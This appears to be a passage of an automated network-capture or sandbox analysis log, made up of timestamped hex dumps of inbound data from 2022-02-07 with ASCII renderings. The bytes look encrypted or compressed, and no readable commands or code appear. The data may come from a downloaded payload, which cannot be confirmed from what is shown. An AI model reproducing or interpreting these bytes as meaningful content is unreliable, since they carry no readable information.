                                                          Data Ascii: &s]hR=vfsG &4vM#V@z~"C.(`XmOzgt38I:_9f=5zd6+xyGXBorpdvWTH_W!L?c%U\WFr9N72lBO,hX1#a<({!keJV:e)apeI-4V
                                                          2022-02-07 11:03:22 UTC186INData Raw: 80 12 ee 12 97 f4 8c 92 0a ed fc 8b 9d 12 3b a8 50 67 e7 cb 9c c1 d6 9c 32 14 53 37 a3 18 1a a2 a1 c8 2e bd 86 8f 75 ee 36 e0 2a 18 ef 44 50 29 ac ae ec 22 0a 82 35 f4 a4 d0 57 1d 72 13 ce 47 d2 9d 38 4d 01 94 93 07 a3 8a 9a 0a 0d b4 f3 34 9b 95 b3 78 fe 73 b8 fe 4f 1c f3 2e 52 64 c7 35 03 be 3d 2a ed ce a4 8f 5e da 51 c5 58 7e 52 91 ae a5 a0 70 e5 4b 66 94 bf 69 7c 4c de 84 82 ee 24 cd ea 90 f2 87 aa f4 31 fd 78 e1 d9 46 f8 6b 51 a6 bf 60 09 ff a1 d9 3f 28 7b 4e 14 45 41 e5 24 5d 39 94 b9 5b 71 c0 34 e5 12 8b 5d 67 58 e6 eb 7d b1 96 57 44 06 4d c4 d2 7c cc f1 78 e0 07 82 34 47 b6 1a 7b 5f 92 e5 14 20 52 39 ef b6 90 84 33 64 fc f8 ef 3e b0 e8 7d 62 46 7a c7 23 25 6a 09 d9 0a b6 d6 8a 0d 76 ee e9 f7 5d 9f 3c 48 5e 25 1c 2e 0b cb 80 00 28 8f 74 01 e9 ff 5b
                                                          Data Ascii: ;Pg2S7.u6*DP)"5WrG8M4xsO.Rd5=*^QX~RpKfi|L$1xFkQ`?({NEA$]9[q4]gX}WDM|x4G{_ R93d>}bFz#%jv]<H^%.(t[
                                                          2022-02-07 11:03:22 UTC187INData Raw: 88 ad 02 fe 37 12 b1 16 9d b8 8a cf 86 95 9e fb 19 ca 66 b0 7a 8b 6d d6 7b 45 b6 1b 1e a3 e7 c8 43 c9 50 77 99 a5 d9 fd b8 18 2d 3e b5 c6 9f 99 0b 08 93 d2 67 98 e0 fe 4d 54 9f ce 19 3e a2 f4 75 b6 3b 24 52 59 19 ff 4b aa 83 31 e1 f8 7e d2 c1 f0 07 00 88 69 aa b5 23 8c e7 ca b1 70 18 0e fd c2 fe 52 93 11 ee 34 dd 50 3f b4 13 55 b2 56 36 36 40 e6 62 71 9a e1 97 e1 63 2d 62 a2 2a 52 b7 fa 2e 84 ef 37 9f 2c d9 01 c2 2b 19 87 cf 6b 60 07 7e fa 0c 45 f5 3c cb 44 d7 61 fe 15 ea 9f 0a b8 79 a0 85 cb 39 90 d9 ac e5 89 87 6e 78 41 5f 2f c2 98 76 7c 7a e6 93 d1 60 d3 0b 82 07 f9 b8 23 a2 c7 d1 21 28 68 0c 77 a5 e7 fb cd 49 2e 64 22 36 19 46 d4 e3 7e 57 aa 4d f0 7f 1f e6 4b 47 3e 50 17 c3 05 88 4d cf 31 18 47 2f ea 17 7e 44 6c 76 63 2c ed 70 2a c4 a8 e8 bd ce 87 c7
                                                          Data Ascii: 7fzm{ECPw->gMT>u;$RYK1~i#pR4P?UV66@bqc-b*R.7,+k`~E<Day9nxA_/v|z`#!(hwI.d"6F~WMKG>PM1G/~Dlvc,p*
                                                          2022-02-07 11:03:22 UTC189INData Raw: f2 18 fb 19 e1 6a 13 b1 e0 ee fc e3 d3 75 93 b1 43 b9 6a 82 0a 53 19 6f db 30 f7 33 4c 82 56 f3 dc a6 e7 98 26 36 86 6f 63 92 5e a3 43 f7 70 a7 06 7f e2 47 35 aa 90 6f 93 c7 1b a3 75 db d9 4f 11 71 6f ab 23 24 70 3b a1 ff 47 6f 5a c7 30 70 f6 8a 3c 99 ba bf 59 ba 2c e7 5c 25 a5 b9 3e 23 16 5c 39 c1 21 7f bb 46 8b 26 36 ce 68 4b 5d 3e bd 8e 44 63 ad 9d 09 ee 7f 8c 9b 14 2e a2 73 d3 2c 28 e9 c0 0f e3 38 04 70 ef 1b 91 8f 8d 35 d2 27 21 da c5 23 ad a7 0e de 79 11 6c d7 0b 45 02 c8 99 ef 11 d5 74 5f 27 a5 82 07 dc 55 8c 6b 57 c4 75 e2 65 99 81 63 26 f5 0b 2b ef 2c f9 78 b6 6b fd 58 f8 b9 ea 22 8d 14 ab d0 29 89 f1 bd 41 a5 5e ad bd 3f e7 5d 12 e8 28 60 75 5e d0 07 ff f7 20 42 01 e3 e2 84 18 07 82 6a 18 83 32 3e 56 27 86 2d b4 a0 b2 b0 ac 09 82 df 56 4b 51 64
                                                          Data Ascii: juCjSo03LV&6oc^CpG5ouOqo#$p;GoZ0p<Y,\%>#\9!F&6hK]>Dc.s,(8p5'!#ylEt_'UkWuec&+,xkX")A^?](`u^ Bj2>V'-VKQd
                                                          2022-02-07 11:03:22 UTC190INData Raw: 08 20 c0 75 35 92 c1 3e c7 e7 ef 36 ed f6 b7 6b ee a1 3a 2e bf 39 54 5a 6e 7c 72 ff 42 9c ec 69 17 48 47 9c fa a4 44 64 bb f4 66 c3 cf ca d2 e2 f0 a2 0a 22 ac 8a 69 cb a3 cf 71 56 63 f3 98 6d ef 97 c6 32 1b 40 f8 2b f4 de 1c 36 ed 85 be fb d4 26 39 cc e5 12 7c 56 19 1e 95 42 8f 07 00 69 cd a2 99 25 23 78 22 7b bf 49 2b 7a 18 d3 15 89 f4 1d c1 db 5e a4 b5 b9 3f 7a 33 a4 bf ab a6 d7 bf ba a6 d0 22 92 2c f7 a8 a8 b7 94 9d a7 e3 76 8d 9e 2b cd d6 90 5c 85 bb 46 0d f1 8e ee ef 09 ac c1 8a ba ae bf 52 2a 55 97 6f 11 fb 7b c1 99 ca bb b2 2f 0a bd 68 04 89 bd 84 c1 61 59 c6 d6 c9 af 0d c5 b8 46 3f 6e c3 c0 29 44 c7 2f bd 9d 4d d3 8e 0c 38 9c 9c d3 0e 83 bc 77 e1 da b9 b7 13 55 91 ba 19 64 9f 16 ec ac c0 40 d0 01 d4 cc 74 73 aa 46 f7 9b ba f8 f7 d6 b0 2d 71 87 7f
                                                          Data Ascii: u5>6k:.9TZn|rBiHGDdf"iqVcm2@+6&9|VBi%#x"{I+z^?z3",v+\FR*Uo{/haYF?n)D/M8wUd@tsF-q
                                                          2022-02-07 11:03:22 UTC191INData Raw: ca 02 4d 63 e7 98 4c 51 f4 9b 2e f0 d8 11 86 8d 58 34 7d 5f e4 9b 8b 5e de b1 ff 22 80 91 c2 ca c0 4d 0f 24 5e a5 a5 54 14 eb c2 c9 26 74 05 7b 5b 9c e2 04 c4 20 c2 25 2d 0c ae 9b 3b 8e 3a e8 ac 5e 1b f9 07 d1 d1 37 a4 d9 98 e3 42 d1 21 a3 e6 9d 85 9d e6 4b bf e1 34 33 a6 86 67 d3 ff ae bf e5 80 b7 84 2d c6 ee e8 28 b8 c0 c2 e8 aa ad 55 34 15 75 ea 1a 01 ce 0a 45 8b f1 1d 83 8f bb f7 b2 17 dd 91 d1 cc b5 c6 61 2a fb a3 4c 0d 0f dc 41 01 65 37 00 66 b5 a3 21 c2 fb 6d 9e ed 2f 82 c5 44 b8 78 f1 34 77 86 30 a1 7a 6d fe 55 97 c8 02 76 47 d7 7f 2e 58 2c 12 a8 37 6a 3b ad c2 6c d2 a5 ad 2c 47 25 1a 55 5c 75 09 89 35 bd db f8 82 13 87 f5 66 6d 60 82 f3 cc ce 16 f8 11 6c 7a b7 59 b7 c1 9d d7 fd 01 0c 51 2f 7b a3 c9 e6 cc c5 ea d2 0a 9c 35 75 ac 13 8d b7 de a8 e4
                                                          Data Ascii: McLQ.X4}_^"M$^T&t{[ %-;:^7B!K43g-(U4uEa*LAe7f!m/Dx4w0zmUvG.X,7j;l,G%U\u5fm`lzYQ/{5u
                                                          2022-02-07 11:03:22 UTC193INData Raw: 0e a9 5a 82 c2 99 11 67 93 cd 19 f9 f8 31 2a 65 4a 4b ec 48 b7 e6 cd 25 40 74 4e 19 6c 26 a3 af 75 07 50 ca 92 60 9c 58 72 19 89 33 e9 97 9f 7c ba 7d 13 44 d9 59 e9 a5 a6 07 5d fd 27 37 28 0e a3 fc 47 5f 12 c4 ea 4b 54 3c 94 18 30 e2 2c 0c 4e d0 02 14 c7 fd 97 7c 15 c8 8d 43 67 b3 6f 02 2c 12 0f 97 9d cc d9 f4 8f bd fd 81 5d b3 bc 30 b9 fc dd d6 02 c4 8d 51 4b e3 53 d3 3b 65 db 2c c6 d3 1e 10 bf 17 78 01 a5 6a 6b f7 04 e7 7c cb 16 70 19 22 02 83 df 20 8a d2 92 b7 a6 5b 04 a8 6c b6 3e 1a 8c 18 5f b4 94 66 87 0c 03 fe 9c 8f ca 68 d3 88 2f 2f a1 02 5e 99 e3 5a ba 83 90 5a c1 f6 0c 59 b8 e2 17 6b 67 05 af d0 95 b0 9a 6d f6 c3 c1 5c 3a ed 2c 03 9b 12 9c 89 44 1d 95 eb 1a 70 66 12 9a 6c 12 68 bb 38 97 b1 86 49 26 11 4b eb d7 b6 06 5c 7a 9a c7 7e 12 90 5d df 7e
                                                          Data Ascii: Zg1*eJKH%@tNl&uP`Xr3|}DY]'7(G_KT<0,N|Cgo,]0QKS;e,xjk|p" [l>_fh//^ZZYkgm\:,Dpflh8I&K\z~]~
                                                          2022-02-07 11:03:22 UTC194INData Raw: af 5c 22 b8 d0 98 94 6f b8 ff 70 ea b7 e3 18 14 17 44 a9 21 1f aa 85 82 99 30 c2 3f d7 e0 5d 12 b2 7b 72 0b d4 81 27 6b 36 12 7a b8 db 14 1e db c0 9f 93 c9 79 da 79 0c f0 0b 06 17 00 29 09 ee 28 8f cb 30 49 36 1b 3f 5a 9d fa e7 3c 00 e7 3d b7 1c 57 02 72 2d 7f 25 8c 5b 2c 51 07 f5 74 4a 8d 74 6f 16 7c b2 57 c9 ef e1 fd 3b 43 37 46 76 a3 7a 38 44 ae fb 84 3d 0c 07 19 25 b6 fa 03 83 37 8e 8b 9c 3d 16 9f 53 f0 2a b5 95 a2 dc 91 58 0d 4d fe bd 9a 3e a6 cf 11 af 0c f1 27 a4 45 d9 af 89 2f 82 d0 cd 71 42 0f 42 18 27 1c fe f3 f3 22 17 96 77 11 58 39 36 35 20 d6 b6 51 f1 34 29 87 2f af 63 8c 09 99 3a 49 00 60 90 25 c9 83 33 e7 cd f3 bf 18 fe bf 72 0e ad bb 90 a4 a5 c0 68 75 f9 fe df f0 30 4e d4 1f 17 b2 45 d4 ef 5f eb de f5 9b d9 e8 74 17 83 f6 56 77 32 ca 38 92
                                                          Data Ascii: \"opD!0?]{r'k6zyy)(0I6?Z<=Wr-%[,QtJto|W;C7Fvz8D=%7=S*XM>'E/qBB'"wX965 Q4)/c:I`%3rhu0NE_tVw28
                                                          2022-02-07 11:03:22 UTC196INData Raw: be 5a 9d 2c bf 88 7c 38 bd 3a ba 6f 7f 50 0b 72 68 7c 84 26 d0 ca 61 58 fd 63 75 0e 5f 9a 56 91 33 b8 49 cc 57 ac db 8e 6b 41 70 bd fb b3 bd 9f a8 6c 1b ea 64 75 2d e2 64 7e c2 98 bd 80 f4 7d 91 24 b2 b2 24 bc 97 dc b8 53 b7 64 4d be 1c 92 b9 d5 bb 0c 28 34 93 99 b3 cb 2d f0 c1 38 07 e1 d6 2c b2 2b 94 ec 24 5c a3 72 1c e2 aa 28 3b 8f 20 c3 45 c0 12 82 22 c5 70 e9 80 60 04 41 05 53 e4 51 66 d0 97 ac 61 cb 9c 56 99 7d 24 7c 1d f6 ee 78 c3 8e 81 bf 75 e2 1b 51 cd cc 63 01 cc 77 15 4f 8c 94 bb 19 7f b5 84 b3 52 43 7e 39 ce c0 82 e0 81 a7 f0 75 94 1d 87 a2 71 5c 21 ab 68 b4 df b7 4f c9 68 e3 3a 4d 2c 2f 40 d4 3f cf c4 9f 72 43 1e 89 81 26 f8 94 0d 18 39 06 76 df ff 07 21 aa e3 d9 68 9a 9e 4f 8d 83 63 a7 6d 98 85 51 7c 7c 1a 4d ad a7 e3 a0 41 a4 e4 f4 1e 68 8c
                                                          Data Ascii: Z,|8:oPrh|&aXcu_V3IWkApldu-d~}$$SdM(4-8,+$\r(; E"p`ASQfaV}$|xuQcwORC~9uq\!hOh:M,/@?rC&9v!hOcmQ||MAh
                                                          2022-02-07 11:03:22 UTC197INData Raw: aa 54 df ed b5 b7 e9 cf c0 34 4b 24 a6 99 03 56 51 93 8a cc 65 d0 87 56 64 ca ac 9e c1 5d 96 81 de ac f5 da 20 03 94 c7 4d 04 57 28 8e ce 8e ae 79 62 0c 28 74 0a 07 eb 59 31 4f a9 47 51 c4 29 45 da 3d bd fa bc d2 aa 35 38 27 24 a6 65 1b 30 2c b8 98 e3 f7 9d 72 5f 7b 65 ec b0 cf 06 9e 68 9a 21 11 46 fa c1 e1 fe 35 59 89 b2 86 d5 60 06 58 13 88 54 a4 7c 17 82 b0 c3 6a 99 2a 0d 90 ef 0e 86 e3 8c 61 6e c6 9c 27 73 87 df 7a 86 e6 47 b0 06 02 3c d4 c1 50 80 23 a3 61 eb 73 57 14 e7 d5 70 87 27 fe 71 a4 0d 48 17 8c 96 0c a0 85 f3 32 76 dd dd 13 e4 7d c3 5a 4a 6f e7 87 a1 fe a7 37 a8 e0 50 a3 5d a2 14 43 66 48 ea d2 0e f7 b6 f3 02 00 f1 3d 93 0c e1 42 f1 a5 27 76 bf d1 68 23 83 cb 95 d0 54 d1 0c 0e 19 02 02 6f 81 4c a7 1f b1 3f 64 d7 8f 82 89 2a 2a f7 d0 4d d0 45
                                                          Data Ascii: T4K$VQeVd] MW(yb(tY1OGQ)E=58'$e0,r_{eh!F5Y`XT|j*an'szG<P#asWp'qH2v}ZJo7P]CfH=B'vh#ToL?d**ME
                                                          2022-02-07 11:03:22 UTC198INData Raw: 02 0f b0 41 f7 dc c0 91 a5 b9 a4 92 e3 f1 a7 dc a8 04 da 1b 5b 2e a8 55 7e 39 d1 98 ea ac aa 3e c7 41 d7 4b ba 2e cc 39 f2 13 fc 8b d4 28 9f 71 2b 4e 13 4a 2c ae b0 68 dc a9 25 12 06 a1 2a aa 90 12 bf 21 11 df 95 9e 02 b8 40 87 95 b6 5f bf d0 ed 8b c2 45 25 d8 f2 8a 55 cb 78 1e e4 9e 64 95 ea 1f ef 79 d0 1b 92 ef c5 68 e9 3a 19 79 ff b9 34 f2 17 85 92 7e 32 92 45 af c1 f7 41 7a 4b 7f 95 51 0a 6a 84 1f 1e d7 fc fa f8 4a 27 c5 66 55 2b 4f 80 bb 9c 61 21 c2 5f 3e 0c 40 f4 04 53 b8 6b c8 7e c4 b1 0e 6a 61 69 12 49 29 92 51 7f 45 67 ca d1 16 f5 e0 0f 3e c5 21 7f 68 0a 58 53 81 80 de a1 87 1d 39 3f cf ab 88 43 1b 45 6e 01 b1 85 ef f8 28 51 2f 04 83 e0 95 56 82 a8 d5 57 85 0b 15 5e ca 92 ee 54 78 53 5a 40 79 2d ca 3e a0 aa 49 0d cb f7 59 c8 d7 35 73 f3 d8 bf 6b
                                                          Data Ascii: A[.U~9>AK.9(q+NJ,h%*!@_E%Uxdyh:y4~2EAzKQjJ'fU+Oa!_>@Sk~jaiI)QEg>!hXS9?CEn(Q/VW^TxSZ@y->IY5sk
                                                          2022-02-07 11:03:22 UTC200INData Raw: c8 eb 2c 4d 58 dc f2 37 45 87 eb 40 64 61 e7 f5 61 39 56 28 fe 87 fc 24 36 b2 73 e8 04 27 ad e8 60 df 87 80 7a cd e2 25 b3 93 af c5 93 05 40 19 93 5c db 59 d7 86 ef 70 4b 9a 88 0b 47 ae 51 6f 33 e6 b0 4b 0e fc 5c ed fb 43 2c 8c ab 52 7f 6b 3b dc f4 d8 9a 95 1a 3d 52 38 69 08 b2 73 4c bb 65 80 b8 9f 4b be 25 4b 7c 97 63 c9 0f 64 28 09 47 34 50 08 b1 03 b8 4e 79 d2 9e d6 c3 16 17 b1 f8 01 d6 ed 67 e8 ec 97 ca c0 e0 b5 a6 cd 92 47 4b 2f 96 28 1c 1a e5 60 48 e3 46 b3 1b 9f 1d 33 71 51 e6 aa 0c ba 6f 0f 36 33 a3 56 fa e8 c2 cb 33 4b 20 8d 27 21 c0 26 6b 03 92 e5 f6 63 fc 98 a2 41 59 8d 0d c7 f2 34 1e fe cf 4d 7e df 9a 4a cc ba 8c a3 7f 3a 68 87 48 3f e7 98 57 5b 6d 94 7a 21 c5 76 a6 79 39 54 8a a5 5b 0a 4f e3 75 fc f5 12 02 87 88 4e 4e a6 fb 4d 02 1c 61 bb 9d
                                                          Data Ascii: ,MX7E@daa9V($6s'`z%@\YpKGQo3K\C,Rk;=R8isLeK%K|cd(G4PNygGK/(`HF3qQo63V3K '!&kcAY4M~J:hH?W[mz!vy9T[OuNNMa
                                                          2022-02-07 11:03:22 UTC201INData Raw: 94 7e d8 4d f5 fa fe 6c 56 60 de 6b fd d7 c9 02 51 1c b1 a8 51 2a d8 99 a9 63 6e 36 e7 52 10 6f 4a 61 4b ee 6e 36 c3 d7 3c f9 3e 61 63 93 20 16 0c 23 3c 26 03 2d 7e 66 40 a2 65 bf 64 09 1b f8 91 f6 ba 06 96 7f 8f 6f ac db c1 c1 65 d6 02 c6 a8 d0 04 48 0d 8a 2b 6b 13 02 1d 37 8d df 7c 40 46 2d 80 36 9a 3c 15 0a 38 a0 a4 1c 58 31 e7 7b 13 dc d3 02 53 8b 1f 2d 4d 65 07 6e ae 7f f2 49 df 6f 9d 31 a1 37 29 50 be 3c ab 33 21 23 dc 7a 34 f3 27 40 84 4f 5c 78 ba 80 ac 08 d7 fb 2d 18 fd b0 ea ac 5b 87 7c 75 9f 6a 0f 47 9d 49 0c d9 e6 96 87 dc 3a c8 26 d6 e1 96 26 87 59 ba 27 56 ba b1 ff 67 fc 31 eb c1 00 dd f0 2a 31 90 1d 58 a4 42 77 a6 83 b8 03 fd fd ba 0d 1d 03 e9 47 6f 74 4a 3f ce 9a 7f 72 a1 ac d4 07 f3 f9 b9 65 13 5e e8 4e c6 a4 93 41 cc ed 52 14 31 cb 4d 0d
                                                          Data Ascii: ~MlV`kQQ*cn6RoJaKn6<>ac #<&-~f@edoeH+k7|@F-6<8X1{S-MenIo17)P<3!#z4'@O\x-[|ujGI:&&Y'Vg1*1XBwGotJ?re^NAR1M
                                                          2022-02-07 11:03:22 UTC202INData Raw: 13 3a 7d b7 08 2a 9a d0 fd f5 2e db 60 bf 93 67 0f ba a0 2b 8e 65 06 06 c6 58 f3 a4 95 c2 9c 3f b4 a7 e5 97 e4 a9 d4 82 41 71 b8 a6 aa 0f 06 9f 86 57 f6 b0 90 72 86 6e a0 1a fe 98 86 e9 71 b5 83 9b 44 b5 62 2a 28 1b 25 27 89 f2 99 2e 3a 81 02 41 44 29 02 52 55 8f d8 7d 5c 59 03 5d 18 6c b3 11 68 40 98 9f f1 34 a4 14 62 91 cf e0 99 d8 46 0a 9b 08 63 60 7c 7b 49 da 1d 54 ae 05 65 a0 7f 7f db 99 66 c1 ab 88 d3 b7 5d 78 13 5f 15 03 58 36 db a4 0a 3e e5 0c b6 77 aa 8d d5 3d f4 62 ca 81 96 ef 6e 7f f6 c1 cc 6a 5c c3 2c b7 49 d4 28 10 a6 20 81 d1 a6 c5 f8 27 3e ce 74 3e 70 62 80 72 7c 11 65 3a bf fa c8 ae b5 1e 6f 23 80 4c 6b 32 67 bd 8d 05 5e 76 03 34 92 05 a2 58 33 96 10 84 cf 3f 74 3e dd 20 e0 b5 1c 14 5b be cf 2d 3f c2 f7 e6 32 8f cc f6 4a 5b 15 d4 fa cc 4b
                                                          Data Ascii: :}*.`g+eX?AqWrnqDb*(%'.:AD)RU}\Y]lh@4bFc`|{ITef]x_X6>w=bnj\,I( '>t>pbr|e:o#Lk2g^v4X3?t> [-?2J[K
                                                          2022-02-07 11:03:22 UTC204INData Raw: 43 a5 d0 b0 14 e1 25 d6 b2 45 5f fc 05 5c 64 2f d6 fa 5d b7 4e 8f 43 1b 5a ed 3d 69 af 70 d0 ff a9 45 45 4e 9c ad 34 6a b0 04 26 65 d8 0f de 6b c4 88 91 65 25 23 2f f1 0e 9c d8 c9 55 13 30 dc 7f 29 3e 78 1d 22 7c a8 ab a1 fe 65 b3 48 02 d9 7a d0 5c 56 85 fa 4b 1b e2 28 2b ce 17 bb 1e 0c d9 97 5b 95 f1 62 05 71 71 c3 1a 14 3e 3e d6 76 98 a9 17 dc fd ab 9e 3f b1 5e 0c e3 31 f4 2a 64 16 04 be a6 bf e0 be 8d 8b c4 27 5d e0 07 d1 5e c0 3a 8a df ed 1c cd 3c fb 03 a6 3b 99 0c 58 ad eb 56 e0 58 9a 7a ae af 1f 51 ae 35 0d e2 5e e8 83 3d 23 a0 5f c2 57 cd 55 82 c3 6d 2d db c6 67 e2 3c de a2 e7 14 3c a8 ee 01 65 19 44 66 72 8a ea 15 40 c7 90 9a 3e d5 84 c7 a5 65 0d 68 38 52 12 df 3f 07 b8 7a 86 3a e3 0a 3c 86 b1 6f c2 94 66 14 ad 82 ba eb d9 fd 8e e0 16 d8 e8 a0 5a
                                                          Data Ascii: C%E_\d/]NCZ=ipEEN4j&eke%#/U0)>x"|eHz\VK(+[bqq>>v?^1*d']^:<;XVXzQ5^=#_WUm-g<<eDfr@>eh8R?z:<ofZ
                                                          2022-02-07 11:03:22 UTC205INData Raw: b4 c7 36 b6 01 7a 33 5c af b9 c6 22 e1 da 47 33 3e 1d d5 b5 4f e1 d6 32 c8 51 f8 27 37 52 db 0b a3 02 e3 d4 ad f6 0c a1 ac c5 d4 7e 1f ae a8 3b cd b6 cc ca f0 70 c4 54 a1 5b 45 d9 c8 ea f9 f7 d4 8d 68 86 9b a1 30 fe a6 71 36 a3 61 a6 f3 3b 33 ef 63 33 90 02 b5 9f e6 3f c4 66 59 8e 78 bf b4 74 13 0b 05 73 fa 28 72 49 2c 31 1b 05 74 cd 21 6b 22 d5 63 95 10 f8 6c d4 ee 6f 64 d9 2b 84 69 e8 dc 4c 71 dc db f0 28 7d 35 df 39 c3 91 1b 7a bc c3 a6 38 fd 09 ee 93 1c 35 41 df 5f 83 b8 b4 15 f2 80 7d 8a 4c 7d 31 bf d2 fa 15 d2 40 13 bb f6 87 ea bc ed b6 e1 e2 a5 f0 9f 0c e9 ee 75 f5 f5 e9 db 61 58 ac 28 2d a1 15 67 c9 cd bd eb 68 8d eb de e4 a7 7a e7 23 e6 50 bf 9d d3 bb bf f1 6e 4f 09 88 8d aa 72 d3 dc b4 38 b2 76 21 94 27 71 49 45 8c 95 cb 0b eb 6f 49 f7 a5 32 08
                                                          Data Ascii: 6z3\"G3>O2Q'7R~;pT[Eh0q6a;3c3?fYxts(rI,1t!k"clod+iLq(}59z85A_}L}1@uaX(-ghz#PnOr8v!'qIEoI2
                                                          2022-02-07 11:03:22 UTC206INData Raw: 9e b3 1a 66 b5 66 b9 2a 2c 97 6c 85 cc 61 65 cb b2 eb da 48 9e 9d a1 6a 53 bd 40 04 41 a5 89 2a 4e 01 6f b8 8b 38 26 18 a6 6c 37 84 3d e6 71 c9 bc ff 03 a3 f4 e9 82 51 da 60 dc b3 ac d5 0c 02 a2 da b7 41 76 f5 95 78 87 03 c7 da c4 79 53 c1 17 4e 3c a0 77 6c 58 82 18 7f 59 e1 94 42 2b e7 90 9e 7a b6 75 3a e0 d5 ae 4e 9a 2b 83 23 97 db 9d f5 e1 f2 76 da 04 9f e6 6f 33 9a 7e 1e 1c 72 c1 98 e1 a6 d9 ff 60 57 0d 22 7f f8 c9 cf e2 29 4c e1 6a 01 dd 04 7d 47 09 62 90 29 09 af 09 e9 c2 d6 4b 87 ed da 5c 05 8c be 64 e9 19 54 0d ae 5d 40 59 d5 74 ba d2 08 48 dc 34 5d 0d 81 37 7e 11 24 ab af a8 e9 1b 94 56 b3 ce 36 6b 7f 66 d7 fe 12 6d 2c 09 2a cc fb d8 7f a6 b0 9b f4 6c 4a a4 3e 94 da a6 ad ff 53 c7 48 48 2e 65 f7 5e 4c 15 14 ba cd 56 27 69 f8 3e 52 77 4f c5 88 f2
                                                          Data Ascii: ff*,laeHjS@A*No8&l7=qQ`AvxySN<wlXYB+zu:N+#vo3~r`W")Lj}Gb)K\dT]@YtH4]7~$V6kfm,*lJ>SHH.e^LV'i>RwO
                                                          2022-02-07 11:03:22 UTC207INData Raw: 4a 51 73 6e 31 72 5a f5 8e 9f 82 5b 30 b2 7f e6 5d c5 ca 1a 79 2b ed 5a 83 68 af ba 66 c4 10 ea fa 2a bd 4c 03 63 f0 46 ab 9a 0a 68 52 8f fc b9 81 0a fc e2 54 4f 14 62 07 ec 52 ce b9 16 0c 92 15 47 ef 00 c7 6d 16 92 9e 4a 9a d1 78 2a fa ca 08 84 64 9d 98 e6 12 a8 ce 99 0a 58 8b ab 3f d6 33 2f 0f 40 90 81 4c b1 df 79 5e 7d c8 da d9 67 e0 43 9a 19 71 b7 00 e4 24 0f d3 ff e6 68 c2 8d a0 eb 79 d2 26 49 2d e3 af b8 c6 a3 1e 90 ba 11 dd 92 ce 2a a5 10 b3 f5 4e 11 f4 c1 26 9e 94 a8 48 71 bb 59 29 29 10 39 98 b1 fa 2c 36 7a 0a 68 f7 1f c0 8b b6 9a 54 ff 5c c1 c6 2d 57 cd a6 ce c0 15 50 b1 38 01 06 77 99 97 ca a4 2c fe f0 1b e8 ce 03 01 17 6c e2 00 2f 08 7a e3 8d 94 34 2e 27 43 5d 9b d8 4d 03 8e 23 5b f6 0c 66 ca 6a 9a 4b f0 0f 99 7c b9 ff 8f ee 62 76 6c 81 26 a1
                                                          Data Ascii: JQsn1rZ[0]y+Zhf*LcFhRTObRGmJx*dX?3/@Ly^}gCq$hy&I-*N&HqY))9,6zhT\-WP8w,l/z4.'C]M#[fjK|bvl&
                                                          2022-02-07 11:03:22 UTC209INData Raw: 7e f1 0d 8b 1d db b1 1c 56 9e 2b 16 57 28 f4 c1 75 41 d9 64 f8 22 66 bc 44 0e 0e 73 b2 1d dd da d4 6a 6b 85 95 43 65 0b 39 a6 5d a6 26 27 98 20 2c ed 0a 7c ba dc d5 12 7b 4c 87 44 27 06 43 51 c9 14 b7 0e b6 b7 84 38 6f fb 18 4f 3e de dd c9 3c a9 cf 14 2b 91 39 2c 85 2b 38 27 65 7f ee c4 ab d7 3c 9b 8e e4 9c b1 6c 87 cb 1e 8f e6 63 35 8d b8 5a 14 bd 37 26 29 68 2b 63 d8 e9 31 32 57 e5 5c 90 2c 5a 25 e5 fd cc 08 04 df 59 5d 03 d1 aa 46 64 a4 76 df d4 f4 20 69 25 07 ee 5e 1f e1 13 07 ca 4d 11 5f 26 aa fb 44 2b 04 cd 8f 31 94 24 ba 6c 6a 31 08 07 ff 19 b5 04 de 84 2e 07 e5 cb e9 2f 23 83 e7 80 ee 83 ee 68 e3 a7 62 22 92 59 04 99 ba 92 1e 99 93 e0 66 d9 2c 99 a8 59 8a d8 6d ba 6a 38 8f 41 b7 1d d8 e0 2a ca 69 5d d7 15 22 70 d0 9c f3 b6 05 27 0a 04 9b 6d fd f8
                                                          Data Ascii: ~V+W(uAd"fDsjkCe9]&' ,|{LD'CQ8oO><+9,+8'e<lc5Z7&)h+c12W\,Z%Y]Fdv i%^M_&D+1$lj1./#hb"Yf,Ymj8A*i]"p'm
                                                          2022-02-07 11:03:22 UTC210INData Raw: ec 9f b8 a6 fd 4a a7 87 d9 8e d2 55 00 99 3d 59 52 d4 60 00 20 dd 45 13 e5 9c d2 11 80 3b c1 81 dd 68 27 29 89 d7 b6 64 be 10 53 05 06 0d 10 5e de e6 39 89 ef 33 42 bc 4a 83 9f 08 ca 93 f1 93 f4 b9 f5 2e df a2 fa 48 f1 c2 34 c1 16 fe 8a 91 d1 91 f9 3c 3b 3b c4 81 57 7b 8a 22 c9 0b e0 af b4 0f 16 ef a7 d6 24 00 1b 77 0a 29 b6 f8 42 2f 6b cd f9 e7 16 3c d7 26 07 85 78 0c e4 c5 c8 51 93 89 11 8b 30 00 56 42 1d cb 01 3a b9 df f5 d0 70 85 aa 05 f5 ef 0d a2 6d b6 9d d5 aa c4 2a 67 20 d6 03 60 bb d6 25 46 73 4d 27 e3 96 2c d1 a6 f5 9d 67 b6 10 3e f2 91 44 8f 9e 91 66 2a c6 c8 f8 17 2d 48 a8 9f 81 81 a6 21 af 82 a8 72 a7 ea a5 f0 63 7d 01 97 f5 7b 3b d5 e2 b2 bd 0e 12 55 19 d4 e6 23 46 1a 2d 28 d1 89 36 25 cc bb de 53 38 0f 98 83 72 fe 02 5d bb a1 d8 88 10 ae 41
                                                          Data Ascii: JU=YR` E;h')dS^93BJ.H4<;;W{"$w)B/k<&xQ0VB:pm*g `%FsM',g>Df*-H!rc}{;U#F-(6%S8r]A
                                                          2022-02-07 11:03:22 UTC211INData Raw: 15 f2 a1 ce a9 7a ad 5d 1d 06 36 22 68 15 4b 2e cc 02 d8 d4 ea e4 8c 6a 5f d6 ab 7f d2 f2 61 00 2f dd e3 61 a4 4f 1f aa bf 04 5e cf 1f df 25 e4 45 f4 71 51 21 0f 3f e8 f7 8e 22 77 9c 41 af 83 39 56 43 ef 26 51 ec 51 f8 0d bd 6a 0f 8d 47 1d f2 99 58 95 b2 39 e6 d2 db 3a 6e f9 30 d3 d6 f6 33 47 57 f9 ca 18 0f a6 04 42 21 f0 38 5a 2a c7 75 48 93 a4 b0 88 d3 04 7a 9c 72 f3 62 45 b6 0a 84 8f f9 b1 b7 70 60 6f a9 ac 0d 37 e3 79 88 24 2f fb 0f 9b ab 24 45 d0 9a d8 05 0a 2d 7d 80 6b dd b7 3c 5d 99 9a 73 dd bd 2b 9c 2b eb ad d2 65 39 b3 3d dd 3d 0b bf 7e 8a e9 c3 00 e2 7a 5c 24 b2 10 73 ae 0b 66 c0 af c7 44 9a a2 2a d9 af cb 43 